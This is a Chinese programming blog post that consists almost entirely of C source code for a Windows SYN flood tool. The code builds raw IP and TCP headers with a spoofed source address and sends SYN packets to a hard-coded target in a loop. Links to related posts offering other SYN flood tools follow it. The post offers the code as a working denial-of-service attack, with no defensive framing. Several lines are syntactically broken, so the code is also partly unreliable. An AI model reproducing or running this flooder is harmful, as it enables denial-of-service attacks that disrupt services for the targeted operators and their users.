SYN Flood

最新推荐文章于 2021-05-05 20:54:24 发布
最新推荐文章于 2021-05-05 20:54:24 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 网络 文章标签: header tcp socket buffer struct null
// syn.h

typedef  struct  _iphdr
 {
        unsigned char h_verlen;            //4位首部长度+4位IP版本号
        unsigned char tos;               //8位服务类型TOS
        unsigned short total_len;      //16位总长度(字节)
        unsigned short ident;            //16位标识
        unsigned short frag_and_flags;  //3位标志位
        unsigned char  ttl;              //8位生存时间 TTL
        unsigned char proto;         //8位协议号(TCP, UDP 或其他)
        unsigned short checksum;        //16位IP首部校验和
        unsigned int sourceIP;            //32位源IP地址
        unsigned int destIP;         //32位目的IP地址

} IP_HEADER;

 
typedef  struct  _tcphdr              // 定义TCP首部
{
    USHORT th_sport;               //16位源端口
    USHORT th_dport;               //16位目的端口
    unsigned int th_seq;         //32位序列号
    unsigned int th_ack;         //32位确认号
    unsigned char th_lenres;        //4位首部长度/6位保留字
    unsigned char th_flag;            //6位标志位
    USHORT th_win;                 //16位窗口大小
    USHORT th_sum;                 //16位校验和
    USHORT th_urp;                 //16位紧急数据偏移量
} TCP_HEADER;

 

 struct   
 {     
        unsigned long saddr;  //源地址
        unsigned long daddr;     //目的地址
        char mbz;                    //置空
        char ptcl;                   //协议类型
        unsigned short tcpl;     //TCP长度

} psd_header;


USHORT checksum(USHORT  * buffer,  int  size)

        unsigned long cksum=0;

        while(size >1
  {
            cksum+=*buffer++;
            size -=sizeof(USHORT);
        }

        if(size ) 
   cksum += *(UCHAR*)buffer;

        cksum = (cksum >> 16+ (cksum & 0xffff);
        cksum += (cksum >>16);

        return (USHORT)(~cksum);
}

 

 

// syn.cpp

#include  " winsock2.h "
#include  " stdio.h "
#include  " memory.h "
#include  " stdlib.h "
#include  " syn.h "

#pragma comment(lib, " ws2_32 " )
 // --------------------------------------------------------------------------------------


#define STATUS_FAILED  0xFFFF     
#define SYN_DEST_IP    " 192.168.0.119 "   // dest 
#define FAKE_IP        " 202.106.127.55 "   // src     fake    :)


int  src_port  =   80 ;
 int  dest_port  =   445 ;  
    

USHORT checksum(USHORT  * buffer,  int  size);


 int  main( void )
 {
 int datasize;
    int ErrorCode;
 int flag;

 int num = 0;
    
 int TimeOut=2000,SendSEQ=0;         
    char SendBuf[128]={0};          
 
    WSADATA  wsaData;
    SOCKET   SockRaw = (SOCKET)NULL;        
    struct   sockaddr_in   DestAddr;       
    IP_HEADER   ip_header;
    TCP_HEADER  tcp_header;

    if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0)     
   {
        fprintf(stderr,"WSAStartup failed: %d ",ErrorCode);
        ExitProcess(STATUS_FAILED);
    }

    SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
 if (SockRaw==INVALID_SOCKET)
  {
        fprintf(stderr,"WSASocket() failed: %d ",WSAGetLastError());
        ExitProcess(STATUS_FAILED);
    }

 flag=TRUE;

 ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
 if(ErrorCode==SOCKET_ERROR)  
  printf("Set IP_HDRINCL Error! ");


 __try
 
  while(num <10240)
  {
   num++;
   if (num ==10239)
   {
    num = 0;
    printf(".");
   }
  

  ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
  if(ErrorCode==SOCKET_ERROR)
  {
            fprintf(stderr,"Failed to set send TimeOut: %d ",WSAGetLastError());
            __leave;
        }

  memset(&DestAddr,0,sizeof(DestAddr));

  
  DestAddr.sin_family=AF_INET;      
  DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); 
  DestAddr.sin_port = htons((u_short)8080);


  //填充IP首部
        ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
        ip_header.tos=0;
                ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));     //16位总长度(字节)
        ip_header.ident=1;                                                       //16位标
        ip_header.frag_and_flags=0;                                               //3位标志位
        ip_header.ttl=128;                                                     //8位生存时间TTL
                ip_header.proto=IPPROTO_TCP;              //8位协议(TCP,UDP…)
                ip_header.checksum=0;                                 //16位IP首部校验和
        ip_header.sourceIP = inet_addr(FAKE_IP);         
                ip_header.destIP   = inet_addr(SYN_DEST_IP);     //32位目的IP地址(攻击地址)

  //填充TCP首部
        tcp_header.th_sport=htons(src_port);                                     //源端口号
        tcp_header.th_dport=htons(dest_port);                                     //目的端口号
        tcp_header.th_seq=htonl(SendSEQ+num);                                //SYN序列号
        tcp_header.th_ack=0;                                                 //ACK序列号置为0
                tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);                    //TCP长度和保留位
        tcp_header.th_flag=2;                                                //SYN 标志
        tcp_header.th_win=htons(16384);            
                tcp_header.th_urp=0;                                                 //偏移
        tcp_header.th_sum=0;                                                 //校验和

        //填充TCP伪首部
        psd_header.saddr=ip_header.sourceIP;                     
                psd_header.daddr=ip_header.destIP;                     
                psd_header.mbz=0;
                psd_header.ptcl=IPPROTO_TCP;                              
               psd_header.tcpl=htons(sizeof(tcp_header));              

       
              memcpy(SendBuf, &psd_header, sizeof(psd_header));         
              memcpy(SendBuf+sizeof(psd_header), &tcp_header, sizeof(tcp_header));   
              tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

      
             memcpy(SendBuf, &ip_header, sizeof(ip_header));   
             memcpy(SendBuf+sizeof(ip_header), &tcp_header, sizeof(tcp_header));   
             memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header), 04);    
             ip_header.checksum=checksum((USHORT *)SendBuf, (sizeof(ip_header)+sizeof(tcp_header)));   

 
             memcpy(SendBuf, &ip_header, sizeof(ip_header));
             memcpy(SendBuf+sizeof(ip_header), &tcp_header, sizeof(tcp_header));

            datasize=sizeof(ip_header)+sizeof(tcp_header);  
        //发送TCP报文
        ErrorCode=sendto(SockRaw,SendBuf,datasize, 0, (struct sockaddr*)&DestAddr, sizeof(DestAddr));
  if(ErrorCode==SOCKET_ERROR) 
   printf(" Send Error:%d ",GetLastError());

  }//end of while

 }//End of try


 __finally 
 {
  if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
  WSACleanup();
 }

 return 0;
}
aganno2
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
syn flood测试工具
03-11
学习网路基础tcp/ip,可以用来模拟黑客攻击仅供测试使用。
syn flood tool
08-11
较强大的syn flood 工具,仅作测试之用,请合理使用。
HUC端口映射-by fooying
12-03
HUC端口映射-by fooying
syn.exe --(HUC SYN Flood Tool V0.2)
04-22
软件说明: 在命令提示符下运行,只支持NT/2000/XP/03系统 中国红客联盟(HUC) 在鼎盛时期的DDOS作品 上传只为学习之用,禁止用于非法途径!
使用Python实现SYN 泛洪攻击(SYN Flood
热门推荐
橘子女侠
09-29 1万+
SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的Tcp连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。 SYN攻击是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文,由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,如果超过一定的时间没有接收到客户端的报文,那么本次连接在协议栈中存储的数据就会被丢...
SYNFlood
04-01
SYN请求和SYN数据包是一样的东西SYN Flood攻击如何工作? SYN Flood攻击通过利用TCP连接的握手过程来工作。 在正常情况下,TCP表现出三个不同的过程以建立连接( )。 客户端通过向服务器发送SYN (同步)数据包来...
SYN flood C源代码
01-25
SYN flood是属于DOS攻击的一种典型方式,其发生方式就出现在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手...
synflood.zip
05-25
标题“synflood.zip”指的是一个包含用于模拟SYN Flood攻击的工具的压缩包。SYN Flood是一种拒绝服务(DoS)攻击,攻击者通过发送大量伪造的TCP连接请求(SYN包)来淹没目标服务器,使其无法处理合法用户的请求。...
syn flood.zip
08-13
**SYN Flood攻击详解** SYN Flood是一种常见的拒绝服务(Denial of Service, DoS)攻击,通过利用TCP协议的握手过程来瘫痪目标网络或系统。这种攻击方式利用了TCP连接建立时的三次握手机制,大量发送SYN(同步序列...
SYN ACK UDP ICMP 碎片攻击
zhangnn5的专栏
06-03 4977
     不太了解碎片攻击,UDP碎片攻击应该是IP碎片攻击的一种吧,这篇文章亮了。 Normal 0 7.8 磅 0 2 false false false MicrosoftInt
syn攻击
lp525110627的博客
10-09 873
1、syn攻击原理 在TCP连接的三次握手中第二次握手时,服务器端发送SYN+ACK报文之后,若在规定的超时间之内未收到客户端响应的ACK报文,则服务器端启用重传机制,向客户端重传SYN+ACK报文,直到收到客户端的响应报文或达到服务器端设置的重传次数为止。syn攻击就是利用这种机制,恶意攻击者向被攻击的服务器端在短时间内发送大量仅含有SYN标志的TCP半连接请求报文。一方面,大量的请求报文会使
linux洪水攻击软件,SYN洪水攻击工具hping SYN-Flooding tool
weixin_32301557的博客
05-05 2852
这是SYN洪水攻击工具hping SYN-Flooding tool,是一個網路工具,可以用來測試firewall, 網路效能, 觀察遠端主機的回應狀態,包括TCP,UDP,ICMP。软件介绍前段时间网站被攻击多次,其中最猛烈的就是TCP洪水攻击,即SYN FloodSYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送...
DHCP相关的实验报告
07-06
DHCP相关的实验报告
mmexport1720232414716.mp4
07-06
mmexport1720232414716.mp4
本文介绍了一种基于MATLAB的脉冲编码调制(PCM)通信系统仿真设计 PCM是一种广泛应用于数字通信系统中的信号编码技术,它通
最新发布
07-07
本文介绍了一种基于MATLAB的脉冲编码调制(PCM)通信系统仿真设计。PCM是一种广泛应用于数字通信系统中的信号编码技术,它通过将模拟信号转换为数字信号来实现信号的传输。本文首先介绍了PCM的基本原理,然后详细描述了基于MATLAB的PCM通信系统的设计与实现过程,包括信号的采样、量化、编码、传输和解码等关键步骤。通过仿真结果,验证了PCM通信系统的性能,并分析了系统在不同信噪比条件下的误码率。最后,本文总结了PCM通信系统在实际应用中的优势和局限性,并对未来的研究方向进行了展望。 关键词: 脉冲编码调制;MATLAB;数字通信;信号处理;仿真
10-1 Packet Tracer - HSRP Configuration Guide
07-06
10-1 Packet Tracer - HSRP Configuration Guide
华硕And85XM-A,编程bios固件
07-06
华硕And85XM-A,编程bios固件
python syn flood
12-15
Python syn flood是一种用于发起网络攻击的工具。该工具利用Python编程语言实现了syn flood攻击的功能,通过不断发送大量的伪造TCP连接请求(SYN包),使目标主机的TCP链接队列被耗尽,从而导致正常的网络通信被中断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值